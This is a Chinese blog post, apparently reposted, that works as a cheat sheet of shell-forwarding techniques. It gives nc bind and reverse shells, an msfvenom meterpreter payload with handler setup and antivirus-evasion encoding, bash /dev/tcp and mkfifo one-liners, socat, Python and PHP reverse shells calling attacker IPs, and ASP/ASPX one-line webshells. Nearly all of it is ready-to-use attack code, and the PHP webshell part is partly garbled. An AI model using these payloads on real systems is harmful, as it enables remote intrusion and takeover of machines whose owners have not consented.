转发shell语句

转发shell语句,第1张

转发shell语句 使用nc 方法一

反dshell

nc -e cmd.exe 攻击机ip 4444(反dwindows shell)
nc -e /bin/bash 攻击机ip 4444(反dlinux shell)
方法二

将shell映射到自己本地的端口上,然后等待他人连接

nc -lvp 4444 -e cmd.exe      (反dwindows shell)
nc -lvp 4444 -e /bin/bash     (反dlinux shell)

连接端口

nc -vv 获取shell的ip 4444
使用msf

msfvenom制作反d木马,自行选择合适的payload和文件类型,以及修改自己的host'

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.7 lport=4444 -f exe -o 123.exe

msfencode来进行编码免杀,

然后msfconsole来进行监听反d的窗口

msfdb run
use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.7
run
使用bash
bash -i >& /dev/tcp/10.10.14.2/8081 0>&1
bash -c 'bash -i >& /dev/tcp/10.10.16.7/4444 0>&1'

0<&31-;exec 31<>/dev/tcp/10.10.16.7/4444;sh <&31 >&31 2>&31

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 1234 >/tmp/f
使用socat

这个是从一个老哥那里看来的没有自己使用过,暂作记录内网渗透之——内网转发

socat反dtcp
接收端(攻击机):
./socat TCP-LISTEN:4444

发送端(靶机):
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.16.7:4444

socat反d(udp)

接收端:

nc -lvnp 4444

发送端:

socat udp-connect:10.10.16.7:4444 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &
使用python

同样需要nc监听本地端口

nc -lvnp 4444

然后想办法在靶机中执行语句

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket. SOCK_STREAM);s.settimeout(10);s.connect(("10.10.14.8",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

用来转发linux的shell

用python发出一个完整的shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
使用php

需要nc监听本地端口

nc -lvnp 4444

然后再php中文件中注入

php -r '$sock=fsockopen("10.10.16.7",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

或者在文件中直接注入系统语句,并留下变量

再或者利用文件上传,用一句话木马,然后用冰蝎剑蚁菜刀一类的东西来连接

php一句话木马:  

asp一句话木马:  <%eval request ("value")%> 或  <% execute(request("value")) %>  

aspx一句话木马: <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>
 
' ) ; ?>
将当前目录下创建xie.php文件,并且将一句话木马写入xd.php中

欢迎分享,转载请注明来源:内存溢出

原文地址: https://www.outofmemory.cn/zaji/5708651.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-17
下一篇 2022-12-17

发表评论

登录后才能评论

评论列表(0条)

保存